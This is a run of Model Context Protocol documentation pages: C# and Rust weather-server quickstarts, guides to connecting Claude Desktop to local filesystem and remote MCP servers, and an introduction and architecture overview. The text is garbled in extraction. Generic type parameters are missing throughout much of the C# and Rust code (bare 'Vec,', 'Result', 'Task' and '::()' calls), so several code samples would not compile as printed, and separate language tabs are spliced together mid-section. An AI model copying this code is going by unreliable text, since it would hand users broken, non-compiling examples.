client.DefaultRequestHeaders.UserAgent.Add(new ProductInfoHeaderValue("weather-tool", "1.0"));
return client;
});
var app = builder.Build();
await app.RunAsync();
```
When creating the `ApplicationHostBuilder`, ensure you use `CreateEmptyApplicationBuilder` instead of `CreateDefaultBuilder`. This ensures that the server does not write any additional messages to the console. This is only necessary for servers using STDIO transport.
This code sets up a basic console application that uses the Model Context Protocol SDK to create an MCP server with standard I/O transport.
### Weather API helper functions
Create an extension class for `HttpClient` which helps simplify JSON request handling:
```csharp theme={null}
using System.Text.Json;
internal static class HttpClientExt
{
public static async Task ReadJsonDocumentAsync(this HttpClient client, string requestUri)
{
using var response = await client.GetAsync(requestUri);
response.EnsureSuccessStatusCode();
return await JsonDocument.ParseAsync(await response.Content.ReadAsStreamAsync());
}
}
```
Next, define a class with the tool execution handlers for querying and converting responses from the National Weather Service API:
```csharp theme={null}
using ModelContextProtocol.Server;
using System.ComponentModel;
using System.Globalization;
using System.Text.Json;
namespace QuickstartWeatherServer.Tools;
[McpServerToolType]
public static class WeatherTools
{
[McpServerTool, Description("Get weather alerts for a US state code.")]
public static async Task GetAlerts(
HttpClient client,
[Description("The US state code to get alerts for.")] string state)
{
using var jsonDocument = await client.ReadJsonDocumentAsync($"/alerts/active/area/{state}");
var jsonElement = jsonDocument.RootElement;
var alerts = jsonElement.GetProperty("features").EnumerateArray();
if (!alerts.Any())
{
return "No active alerts for this state.";
}
return string.Join("\n--\n", alerts.Select(alert =>
{
JsonElement properties = alert.GetProperty("properties");
return $"""
Event: {properties.GetProperty("event").GetString()}
Area: {properties.GetProperty("areaDesc").GetString()}
Severity: {properties.GetProperty("severity").GetString()}
Description: {properties.GetProperty("description").GetString()}
Instruction: {properties.GetProperty("instruction").GetString()}
""";
}));
}
[McpServerTool, Description("Get weather forecast for a location.")]
public static async Task GetForecast(
HttpClient client,
[Description("Latitude of the location.")] double latitude,
[Description("Longitude of the location.")] double longitude)
{
var pointUrl = string.Create(CultureInfo.InvariantCulture, $"/points/{latitude},{longitude}");
using var jsonDocument = await client.ReadJsonDocumentAsync(pointUrl);
var forecastUrl = jsonDocument.RootElement.GetProperty("properties").GetProperty("forecast").GetString()
?? throw new Exception($"No forecast URL provided by {client.BaseAddress}points/{latitude},{longitude}");
using var forecastDocument = await client.ReadJsonDocumentAsync(forecastUrl);
var periods = forecastDocument.RootElement.GetProperty("properties").GetProperty("periods").EnumerateArray();
return string.Join("\n---\n", periods.Select(period => $"""
{period.GetProperty("name").GetString()}
Temperature: {period.GetProperty("temperature").GetInt32()}°F
Wind: {period.GetProperty("windSpeed").GetString()} {period.GetProperty("windDirection").GetString()}
Forecast: {period.GetProperty("detailedForecast").GetString()}
"""));
}
}
```
### Running the server
Finally, run the server using the following command:
```bash theme={null}
dotnet run
```
This will start the server and listen for incoming requests on standard input/output.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version
here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use. To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor. Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key. The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "dotnet",
"args": ["run", "--project", "/ABSOLUTE/PATH/TO/PROJECT", "--no-build"]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "dotnet",
"args": [
"run",
"--project",
"C:\\ABSOLUTE\\PATH\\TO\\PROJECT",
"--no-build"
]
}
}
}
```
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. Launch it by running `dotnet run /ABSOLUTE/PATH/TO/PROJECT`
Save the file, and restart **Claude for Desktop**.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-rust)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* Rust programming language
* Async/await in Rust
* LLMs like Claude
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `println!()` in Rust
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files, such as `tracing` or `log` in Rust.
2. Configure your logging framework to avoid stdout output.
### Quick Examples
```rust theme={null}
// ❌ Bad (STDIO)
println!("Processing request");
// ✅ Good (STDIO)
use tracing::info;
info!("Processing request"); // writes to stderr
```
### System requirements
* Rust 1.70 or higher installed.
* Cargo (comes with Rust installation).
### Set up your environment
First, let's install Rust if you haven't already. You can install Rust from [rust-lang.org](https://www.rust-lang.org/tools/install):
```bash macOS/Linux theme={null}
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
```
```powershell Windows theme={null}
# Download and run rustup-init.exe from https://rustup.rs/
```
Verify your Rust installation:
```bash theme={null}
rustc --version
cargo --version
```
Now, let's create and set up our project:
```bash macOS/Linux theme={null}
# Create a new Rust project
cargo new weather
cd weather
```
```powershell Windows theme={null}
# Create a new Rust project
cargo new weather
cd weather
```
Update your `Cargo.toml` to add the required dependencies:
```toml Cargo.toml theme={null}
[package]
name = "weather"
version = "0.1.0"
edition = "2024"
[dependencies]
rmcp = { version = "0.3", features = ["server", "macros", "transport-io"] }
tokio = { version = "1.46", features = ["full"] }
reqwest = { version = "0.12", features = ["json"] }
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
anyhow = "1.0"
tracing = "0.1"
tracing-subscriber = { version = "0.3", features = ["env-filter", "std", "fmt"] }
```
Now let's dive into building your server.
## Building your server
### Importing packages and constants
Open `src/main.rs` and add these imports and constants at the top:
```rust theme={null}
use anyhow::Result;
use rmcp::{
ServerHandler, ServiceExt,
handler::server::{router::tool::ToolRouter, tool::Parameters},
model::*,
schemars, tool, tool_handler, tool_router,
};
use serde::Deserialize;
use serde::de::DeserializeOwned;
const NWS_API_BASE: &str = "https://api.weather.gov";
const USER_AGENT: &str = "weather-app/1.0";
```
The `rmcp` crate provides the Model Context Protocol SDK for Rust, with features for server implementation, procedural macros, and stdio transport.
### Data structures
Next, let's define the data structures for deserializing responses from the National Weather Service API:
```rust theme={null}
#[derive(Debug, Deserialize)]
struct AlertsResponse {
features: Vec,
}
#[derive(Debug, Deserialize)]
struct AlertFeature {
properties: AlertProperties,
}
#[derive(Debug, Deserialize)]
struct AlertProperties {
event: Option,
#[serde(rename = "areaDesc")]
area_desc: Option,
severity: Option,
description: Option,
instruction: Option,
}
#[derive(Debug, Deserialize)]
struct PointsResponse {
properties: PointsProperties,
}
#[derive(Debug, Deserialize)]
struct PointsProperties {
forecast: String,
}
#[derive(Debug, Deserialize)]
struct ForecastResponse {
properties: ForecastProperties,
}
#[derive(Debug, Deserialize)]
struct ForecastProperties {
periods: Vec,
}
#[derive(Debug, Deserialize)]
struct ForecastPeriod {
name: String,
temperature: i32,
#[serde(rename = "temperatureUnit")]
temperature_unit: String,
#[serde(rename = "windSpeed")]
wind_speed: String,
#[serde(rename = "windDirection")]
wind_direction: String,
#[serde(rename = "detailedForecast")]
detailed_forecast: String,
}
```
Now define the request types that MCP clients will send:
```rust theme={null}
#[derive(serde::Deserialize, schemars::JsonSchema)]
pub struct MCPForecastRequest {
latitude: f32,
longitude: f32,
}
#[derive(serde::Deserialize, schemars::JsonSchema)]
pub struct MCPAlertRequest {
state: String,
}
```
### Helper functions
Add helper functions for making API requests and formatting responses:
```rust theme={null}
async fn make_nws_request(url: &str) -> Result {
let client = reqwest::Client::new();
let rsp = client
.get(url)
.header(reqwest::header::USER_AGENT, USER_AGENT)
.header(reqwest::header::ACCEPT, "application/geo+json")
.send()
.await?
.error_for_status()?;
Ok(rsp.json::().await?)
}
fn format_alert(feature: &AlertFeature) -> String {
let props = &feature.properties;
format!(
"Event: {}\nArea: {}\nSeverity: {}\nDescription: {}\nInstructions: {}",
props.event.as_deref().unwrap_or("Unknown"),
props.area_desc.as_deref().unwrap_or("Unknown"),
props.severity.as_deref().unwrap_or("Unknown"),
props
.description
.as_deref()
.unwrap_or("No description available"),
props
.instruction
.as_deref()
.unwrap_or("No specific instructions provided")
)
}
fn format_period(period: &ForecastPeriod) -> String {
format!(
"{}:\nTemperature: {}°{}\nWind: {} {}\nForecast: {}",
period.name,
period.temperature,
period.temperature_unit,
period.wind_speed,
period.wind_direction,
period.detailed_forecast
)
}
```
### Implementing the Weather server and tools
Now let's implement the main Weather server struct with the tool handlers:
```rust theme={null}
pub struct Weather {
tool_router: ToolRouter,
}
#[tool_router]
impl Weather {
fn new() -> Self {
Self {
tool_router: Self::tool_router(),
}
}
#[tool(description = "Get weather alerts for a US state.")]
async fn get_alerts(
&self,
Parameters(MCPAlertRequest { state }): Parameters,
) -> String {
let url = format!(
"{}/alerts/active/area/{}",
NWS_API_BASE,
state.to_uppercase()
);
match make_nws_request::(&url).await {
Ok(data) => {
if data.features.is_empty() {
"No active alerts for this state.".to_string()
} else {
data.features
.iter()
.map(format_alert)
.collect::>()
.join("\n---\n")
}
}
Err(_) => "Unable to fetch alerts or no alerts found.".to_string(),
}
}
#[tool(description = "Get weather forecast for a location.")]
async fn get_forecast(
&self,
Parameters(MCPForecastRequest {
latitude,
longitude,
}): Parameters,
) -> String {
let points_url = format!("{NWS_API_BASE}/points/{latitude},{longitude}");
let Ok(points_data) = make_nws_request::(&points_url).await else {
return "Unable to fetch forecast data for this location.".to_string();
};
let forecast_url = points_data.properties.forecast;
let Ok(forecast_data) = make_nws_request::(&forecast_url).await else {
return "Unable to fetch forecast data for this location.".to_string();
};
let periods = &forecast_data.properties.periods;
let forecast_summary: String = periods
.iter()
.take(5) // Next 5 periods only
.map(format_period)
.collect::>()
.join("\n---\n");
forecast_summary
}
}
```
The `#[tool_router]` macro automatically generates the routing logic, and the `#[tool]` attribute marks methods as MCP tools.
### Implementing the ServerHandler
Implement the `ServerHandler` trait to define server capabilities:
```rust theme={null}
#[tool_handler]
impl ServerHandler for Weather {
fn get_info(&self) -> ServerInfo {
ServerInfo {
capabilities: ServerCapabilities::builder().enable_tools().build(),
..Default::default()
}
}
}
```
### Running the server
Finally, implement the main function to run the server with stdio transport:
```rust theme={null}
#[tokio::main]
async fn main() -> Result<()> {
let transport = (tokio::io::stdin(), tokio::io::stdout());
let service = Weather::new().serve(transport).await?;
service.waiting().await?;
Ok(())
}
```
Build your server with:
```bash theme={null}
cargo build --release
```
The compiled binary will be in `target/release/weather`.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use. To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor. Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key. The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "/ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/target/release/weather"
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "C:\\ABSOLUTE\\PATH\\TO\\PARENT\\FOLDER\\weather\\target\\release\\weather.exe"
}
}
}
```
Make sure you pass in the absolute path to your compiled binary. You can get this by running `pwd` on macOS/Linux or `cd` on Windows Command Prompt from your project directory. On Windows, remember to use double backslashes (`\\`) or forward slashes (`/`) in the JSON path, and add the `.exe` extension.
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. Launch it by running the compiled binary at the specified path
Save the file, and restart **Claude for Desktop**.
### Test with commands
Let's make sure Claude for Desktop is picking up the two tools we've exposed in our `weather` server. You can do this by looking for the "Add files, connectors, and more /" icon:
After clicking on the plus icon, hover over the "Connectors" menu, you should see the `weather`servers listed:
If your server isn't being picked up by Claude for Desktop, proceed to the [Troubleshooting](#troubleshooting) section for debugging tips.
If the server has shown up in the "Connectors" menu, you can now test your server by running the following commands in Claude for Desktop:
* What's the weather in Sacramento?
* What are the active weather alerts in Texas?
Since this is the US National Weather service, the queries will only work for US locations.
## What's happening under the hood
When you ask a question:
1. The client sends your question to Claude
2. Claude analyzes the available tools and decides which one(s) to use
3. The client executes the chosen tool(s) through the MCP server
4. The results are sent back to Claude
5. Claude formulates a natural language response
6. The response is displayed to you!
## Troubleshooting
**Getting logs from Claude for Desktop**
Claude.app logging related to MCP is written to log files in `~/Library/Logs/Claude`:
* `mcp.log` will contain general logging about MCP connections and connection failures.
* Files named `mcp-server-SERVERNAME.log` will contain error (stderr) logging from the named server.
You can run the following command to list recent logs and follow along with any new ones:
```bash theme={null}
# Check Claude's logs for errors
tail -n 20 -f ~/Library/Logs/Claude/mcp*.log
```
**Server not showing up in Claude**
1. Check your `claude_desktop_config.json` file syntax
2. Make sure the path to your project is absolute and not relative
3. Restart Claude for Desktop completely
To properly restart Claude for Desktop, you must fully quit the application:
* **Windows**: Right-click the Claude icon in the system tray (which may be hidden in the "hidden icons" menu) and select "Quit" or "Exit".
* **macOS**: Use Cmd+Q or select "Quit Claude" from the menu bar.
Simply closing the window does not fully quit the application, and your MCP server configuration changes will not take effect.
**Tool calls failing silently**
If Claude attempts to use the tools but they fail:
1. Check Claude's logs for errors
2. Verify your server builds and runs without errors
3. Try restarting Claude for Desktop
**None of this is working. What do I do?**
Please refer to our [debugging guide](/legacy/tools/debugging) for better debugging tools and more detailed guidance.
**Error: Failed to retrieve grid point data**
This usually means either:
1. The coordinates are outside the US
2. The NWS API is having issues
3. You're being rate limited
Fix:
* Verify you're using US coordinates
* Add a small delay between requests
* Check the NWS API status page
**Error: No active alerts for \[STATE]**
This isn't an error - it just means there are no current weather alerts for that state. Try a different state or check during severe weather.
For more advanced troubleshooting, check out our guide on [Debugging MCP](/legacy/tools/debugging)
## Next steps
Learn how to build your own MCP client that can connect to your server
Check out our gallery of official MCP servers and implementations
Learn how to effectively debug MCP servers and integrations
Learn how to use LLMs like Claude to speed up your MCP development
# Connect to local MCP servers
Source: https://modelcontextprotocol.io/docs/develop/connect-local-servers
Learn how to extend Claude Desktop with local MCP servers to enable file system access and other powerful integrations
Model Context Protocol (MCP) servers extend AI applications' capabilities by providing secure, controlled access to local resources and tools. Many clients support MCP, enabling diverse integration possibilities across different platforms and applications.
This guide demonstrates how to connect to local MCP servers using Claude Desktop as an example, one of the [many clients that support MCP](/clients). While we focus on Claude Desktop's implementation, the concepts apply broadly to other MCP-compatible clients. By the end of this tutorial, Claude will be able to interact with files on your computer, create new documents, organize folders, and search through your file system—all with your explicit permission for each action.
## Prerequisites
Before starting this tutorial, ensure you have the following installed on your system:
### Claude Desktop
Download and install [Claude Desktop](https://claude.ai/download) for your operating system. Claude Desktop is available for macOS and Windows.
If you already have Claude Desktop installed, verify you're running the latest version by clicking the Claude menu and selecting "Check for Updates..."
### Node.js
The Filesystem Server and many other MCP servers require Node.js to run. Verify your Node.js installation by opening a terminal or command prompt and running:
```bash theme={null}
node --version
```
If Node.js is not installed, download it from [nodejs.org](https://nodejs.org/). We recommend the LTS (Long Term Support) version for stability.
## Understanding MCP Servers
MCP servers are programs that run on your computer and provide specific capabilities to Claude Desktop through a standardized protocol. Each server exposes tools that Claude can use to perform actions, with your approval. The Filesystem Server we'll install provides tools for:
* Reading file contents and directory structures
* Creating new files and directories
* Moving and renaming files
* Searching for files by name or content
All actions require your explicit approval before execution, ensuring you maintain full control over what Claude can access and modify.
## Installing the Filesystem Server
The process involves configuring Claude Desktop to automatically start the Filesystem Server whenever you launch the application. This configuration is done through a JSON file that tells Claude Desktop which servers to run and how to connect to them.
Start by accessing the Claude Desktop settings. Click on the Claude menu in your system's menu bar (not the settings within the Claude window itself) and select "Settings..."
On macOS, this appears in the top menu bar:
This opens the Claude Desktop configuration window, which is separate from your Claude account settings.
In the Settings window, navigate to the "Developer" tab in the left sidebar. This section contains options for configuring MCP servers and other developer features.
Click the "Edit Config" button to open the configuration file:
This action creates a new configuration file if one doesn't exist, or opens your existing configuration. The file is located at:
* **macOS**: `~/Library/Application Support/Claude/claude_desktop_config.json`
* **Windows**: `%APPDATA%\Claude\claude_desktop_config.json`
Replace the contents of the configuration file with the following JSON structure. This configuration tells Claude Desktop to start the Filesystem Server with access to specific directories:
```json macOS theme={null}
{
"mcpServers": {
"filesystem": {
"command": "npx",
"args": [
"-y",
"@modelcontextprotocol/server-filesystem",
"/Users/username/Desktop",
"/Users/username/Downloads"
]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"filesystem": {
"command": "npx",
"args": [
"-y",
"@modelcontextprotocol/server-filesystem",
"C:\\Users\\username\\Desktop",
"C:\\Users\\username\\Downloads"
]
}
}
}
```
Replace `username` with your actual computer username. The paths listed in the `args` array specify which directories the Filesystem Server can access. You can modify these paths or add additional directories as needed.
**Understanding the Configuration**
* `"filesystem"`: A friendly name for the server that appears in Claude Desktop
* `"command": "npx"`: Uses Node.js's npx tool to run the server
* `"-y"`: Automatically confirms the installation of the server package
* `"@modelcontextprotocol/server-filesystem"`: The package name of the Filesystem Server
* The remaining arguments: Directories the server is allowed to access
**Security Consideration**
Only grant access to directories you're comfortable with Claude reading and modifying. The server runs with your user account permissions, so it can perform any file operations you can perform manually.
After saving the configuration file, completely quit Claude Desktop and restart it. The application needs to restart to load the new configuration and start the MCP server.
Upon successful restart, you'll see an MCP server indicator in the bottom-right corner of the conversation input box:
Click on this indicator to view the available tools provided by the Filesystem Server:
If the server indicator doesn't appear, refer to the [Troubleshooting](#troubleshooting) section for debugging steps.
## Using the Filesystem Server
With the Filesystem Server connected, Claude can now interact with your file system. Try these example requests to explore the capabilities:
### File Management Examples
* **"Can you write a poem and save it to my desktop?"** - Claude will compose a poem and create a new text file on your desktop
* **"What work-related files are in my downloads folder?"** - Claude will scan your downloads and identify work-related documents
* **"Please organize all images on my desktop into a new folder called 'Images'"** - Claude will create a folder and move image files into it
### How Approval Works
Before executing any file system operation, Claude will request your approval. This ensures you maintain control over all actions:
Review each request carefully before approving. You can always deny a request if you're not comfortable with the proposed action.
## Troubleshooting
If you encounter issues setting up or using the Filesystem Server, these solutions address common problems:
1. Restart Claude Desktop completely
2. Check your `claude_desktop_config.json` file syntax
3. Make sure the file paths included in `claude_desktop_config.json` are valid and that they are absolute and not relative
4. Look at [logs](#getting-logs-from-claude-for-desktop) to see why the server is not connecting
5. In your command line, try manually running the server (replacing `username` as you did in `claude_desktop_config.json`) to see if you get any errors:
```bash macOS/Linux theme={null}
npx -y @modelcontextprotocol/server-filesystem /Users/username/Desktop /Users/username/Downloads
```
```powershell Windows theme={null}
npx -y @modelcontextprotocol/server-filesystem C:\Users\username\Desktop C:\Users\username\Downloads
```
Claude.app logging related to MCP is written to log files in:
* macOS: `~/Library/Logs/Claude`
* Windows: `%APPDATA%\Claude\logs`
* `mcp.log` will contain general logging about MCP connections and connection failures.
* Files named `mcp-server-SERVERNAME.log` will contain error (stderr) logging from the named server.
You can run the following command to list recent logs and follow along with any new ones (on Windows, it will only show recent logs):
```bash macOS/Linux theme={null}
tail -n 20 -f ~/Library/Logs/Claude/mcp*.log
```
```powershell Windows theme={null}
type "%APPDATA%\Claude\logs\mcp*.log"
```
If Claude attempts to use the tools but they fail:
1. Check Claude's logs for errors
2. Verify your server builds and runs without errors
3. Try restarting Claude Desktop
Please refer to our [debugging guide](/legacy/tools/debugging) for better debugging tools and more detailed guidance.
If your configured server fails to load, and you see within its logs an error referring to `${APPDATA}` within a path, you may need to add the expanded value of `%APPDATA%` to your `env` key in `claude_desktop_config.json`:
```json theme={null}
{
"brave-search": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-brave-search"],
"env": {
"APPDATA": "C:\\Users\\user\\AppData\\Roaming\\",
"BRAVE_API_KEY": "..."
}
}
}
```
With this change in place, launch Claude Desktop once again.
**npm should be installed globally**
The `npx` command may continue to fail if you have not installed npm globally. If npm is already installed globally, you will find `%APPDATA%\npm` exists on your system. If not, you can install npm globally by running the following command:
```bash theme={null}
npm install -g npm
```
## Next Steps
Now that you've successfully connected Claude Desktop to a local MCP server, explore these options to expand your setup:
Browse our collection of official and community-created MCP servers for
additional capabilities
Create custom MCP servers tailored to your specific workflows and
integrations
Learn how to connect Claude to remote MCP servers for cloud-based tools and
services
Dive deeper into how MCP works and its architecture
# Connect to remote MCP Servers
Source: https://modelcontextprotocol.io/docs/develop/connect-remote-servers
Learn how to connect Claude to remote MCP servers and extend its capabilities with internet-hosted tools and data sources
Remote MCP servers extend AI applications' capabilities beyond your local environment, providing access to internet-hosted tools, services, and data sources. By connecting to remote MCP servers, you transform AI assistants from helpful tools into informed teammates capable of handling complex, multi-step projects with real-time access to external resources.
Many clients now support remote MCP servers, enabling a wide range of integration possibilities. This guide demonstrates how to connect to remote MCP servers using [Claude](https://claude.ai/) as an example, one of the [many clients that support MCP](/clients). While we focus on Claude's implementation through Custom Connectors, the concepts apply broadly to other MCP-compatible clients.
## Understanding Remote MCP Servers
Remote MCP servers function similarly to local MCP servers but are hosted on the internet rather than your local machine. They expose tools, prompts, and resources that Claude can use to perform tasks on your behalf. These servers can integrate with various services such as project management tools, documentation systems, code repositories, and any other API-enabled service.
The key advantage of remote MCP servers is their accessibility. Unlike local servers that require installation and configuration on each device, remote servers are available from any MCP client with an internet connection. This makes them ideal for web-based AI applications, integrations that emphasize ease-of-use and services that require server-side processing or authentication.
## What are Custom Connectors?
Custom Connectors serve as the bridge between Claude and remote MCP servers. They allow you to connect Claude directly to the tools and data sources that matter most to your workflows, enabling Claude to operate within your favorite software and draw insights from the complete context of your external tools.
With Custom Connectors, you can:
* [Connect Claude to existing remote MCP servers](https://support.anthropic.com/en/articles/11175166-getting-started-with-custom-connectors-using-remote-mcp) provided by third-party developers
* [Build your own remote MCP servers to connect with any tool](https://support.anthropic.com/en/articles/11503834-building-custom-connectors-via-remote-mcp-servers)
## Connecting to a Remote MCP Server
The process of connecting Claude to a remote MCP server involves adding a Custom Connector through the [Claude interface](https://claude.ai/). This establishes a secure connection between Claude and your chosen remote server.
Open Claude in your browser and navigate to the settings page. You can access this by clicking on your profile icon and selecting "Settings" from the dropdown menu. Once in settings, locate and click on the "Connectors" section in the sidebar.
This will display your currently configured connectors and provide options to add new ones.
In the Connectors section, scroll to the bottom where you'll find the "Add custom connector" button. Click this button to begin the connection process.
A dialog will appear prompting you to enter the remote MCP server URL. This URL should be provided by the server developer or administrator. Enter the complete URL, ensuring it includes the proper protocol (https\://) and any necessary path components.
After entering the URL, click "Add" to proceed with the connection.
Most remote MCP servers require authentication to ensure secure access to their resources. The authentication process varies depending on the server implementation but commonly involves OAuth, API keys, or username/password combinations.
Follow the authentication prompts provided by the server. This may redirect you to a third-party authentication provider or display a form within Claude. Once authentication is complete, Claude will establish a secure connection to the remote server.
After successful connection, the remote server's resources and prompts become available in your Claude conversations. You can access these by clicking the paperclip icon in the message input area, which opens the attachment menu.
The menu displays all available resources and prompts from your connected servers. Select the items you want to include in your conversation. These resources provide Claude with context and information from your external tools.
Remote MCP servers often expose multiple tools with varying capabilities. You can control which tools Claude is allowed to use by configuring permissions in the connector settings. This ensures Claude only performs actions you've explicitly authorized.
Navigate back to the Connectors settings and click on your connected server. Here you can enable or disable specific tools, set usage limits, and configure other security parameters according to your needs.
## Best Practices for Using Remote MCP Servers
When working with remote MCP servers, consider these recommendations to ensure a secure and efficient experience:
**Security considerations**: Always verify the authenticity of remote MCP servers before connecting. Only connect to servers from trusted sources, and review the permissions requested during authentication. Be cautious about granting access to sensitive data or systems.
**Managing multiple connectors**: You can connect to multiple remote MCP servers simultaneously. Organize your connectors by purpose or project to maintain clarity. Regularly review and remove connectors you no longer use to keep your workspace organized and secure.
## Next Steps
Now that you've connected Claude to a remote MCP server, you can explore its capabilities in your conversations. Try using the connected tools to automate tasks, access external data, or integrate with your existing workflows.
Create custom remote MCP servers to integrate with proprietary tools and
services
Browse our collection of official and community-created MCP servers
Learn how to connect Claude Desktop to local MCP servers for direct system
access
Dive deeper into how MCP works and its architecture
Remote MCP servers unlock powerful possibilities for extending Claude's capabilities. As you become familiar with these integrations, you'll discover new ways to streamline your workflows and accomplish complex tasks more efficiently.
# What is the Model Context Protocol (MCP)?
Source: https://modelcontextprotocol.io/docs/getting-started/intro
MCP (Model Context Protocol) is an open-source standard for connecting AI applications to external systems.
Using MCP, AI applications like Claude or ChatGPT can connect to data sources (e.g. local files, databases), tools (e.g. search engines, calculators) and workflows (e.g. specialized prompts)—enabling them to access key information and perform tasks.
Think of MCP like a USB-C port for AI applications. Just as USB-C provides a standardized way to connect electronic devices, MCP provides a standardized way to connect AI applications to external systems.
## What can MCP enable?
* Agents can access your Google Calendar and Notion, acting as a more personalized AI assistant.
* Claude Code can generate an entire web app using a Figma design.
* Enterprise chatbots can connect to multiple databases across an organization, empowering users to analyze data using chat.
* AI models can create 3D designs on Blender and print them out using a 3D printer.
## Why does MCP matter?
Depending on where you sit in the ecosystem, MCP can have a range of benefits.
* **Developers**: MCP reduces development time and complexity when building, or integrating with, an AI application or agent.
* **AI applications or agents**: MCP provides access to an ecosystem of data sources, tools and apps which will enhance capabilities and improve the end-user experience.
* **End-users**: MCP results in more capable AI applications or agents which can access your data and take actions on your behalf when necessary.
## Start Building
Create MCP servers to expose your data and tools
Develop applications that connect to MCP servers
## Learn more
Learn the core concepts and architecture of MCP
# Architecture overview
Source: https://modelcontextprotocol.io/docs/learn/architecture
This overview of the Model Context Protocol (MCP) discusses its [scope](#scope) and [core concepts](#concepts-of-mcp), and provides an [example](#example) demonstrating each core concept.
Because MCP SDKs abstract away many concerns, most developers will likely find the [data layer protocol](#data-layer-protocol) section to be the most useful. It discusses how MCP servers can provide context to an AI application.
For specific implementation details, please refer to the documentation for your [language-specific SDK](/docs/sdk).
## Scope
The Model Context Protocol includes the following projects:
* [MCP Specification](https://modelcontextprotocol.io/specification/latest): A specification of MCP that outlines the implementation requirements for clients and servers.
* [MCP SDKs](/docs/sdk): SDKs for different programming languages that implement MCP.
* **MCP Development Tools**: Tools for developing MCP servers and clients, including the [MCP Inspector](https://github.com/modelcontextprotocol/inspector)
* [MCP Reference Server Implementations](https://github.com/modelcontextprotocol/servers): Reference implementations of MCP servers.
MCP focuses solely on the protocol for context exchange—it does not dictate
how AI applications use LLMs or manage the provided context.
## Concepts of MCP
### Participants
MCP follows a client-server architecture where an MCP host — an AI application like [Claude Code](https://www.anthropic.com/claude-code) or [Claude Desktop](https://www.claude.ai/download) — establishes connections to one or more MCP servers. The MCP host accomplishes this by creating one MCP client for each MCP server. Each MCP client maintains a dedicated connection with its corresponding MCP server.
Local MCP servers that use the STDIO transport typically serve a single MCP client, whereas remote MCP servers that use the Streamable HTTP transport will typically serve many MCP clients.
The key participants in the MCP architecture are:
* **MCP Host**: The AI application that coordinates and manages one or multiple MCP clients
* **MCP Client**: A component that maintains a connection to an MCP server and obtains context from an MCP server for the MCP host to use
* **MCP Server**: A program that provides context to MCP clients
**For example**: Visual Studio Code acts as an MCP host. When Visual Studio Code establishes a connection to an MCP server, such as the [Sentry MCP server](https://docs.sentry.io/product/sentry-mcp/), the Visual Studio Code runtime instantiates an MCP client object that maintains the connection to the Sentry MCP server.
When Visual Studio Code subsequently connects to another MCP server, such as the [local filesystem server](https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem), the Visual Studio Code runtime instantiates an additional MCP client object to maintain this connection.
```mermaid theme={null}
graph TB
subgraph "MCP Host (AI Application)"
Client1["MCP Client 1"]
Client2["MCP Client 2"]
Client3["MCP Client 3"]
Client4["MCP Client 4"]
end
ServerA["MCP Server A - Local (e.g. Filesystem)"]
ServerB["MCP Server B - Local (e.g. Database)"]
ServerC["MCP Server C - Remote (e.g. Sentry)"]
Client1 ---|"Dedicated connection"| ServerA
Client2 ---|"Dedicated connection"| ServerB
Client3 ---|"Dedicated connection"| ServerC
Client4 ---|"Dedicated connection"| ServerC
```
Note that **MCP server** refers to the program that serves context data, regardless of
where it runs. MCP servers can execute locally or remotely. For example, when
Claude Desktop launches the [filesystem
server](https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem),
the server runs locally on the same machine because it uses the STDIO
transport. This is commonly referred to as a "local" MCP server. The official
[Sentry MCP server](https://docs.sentry.io/product/sentry-mcp/) runs on the
Sentry platform, and uses the Streamable HTTP transport. This is commonly
referred to as a "remote" MCP server.
### Layers
MCP consists of two layers:
* **Data layer**: Defines the JSON-RPC based protocol for client-server communication, including lifecycle management, and core primitives, such as tools, resources, prompts and notifications.
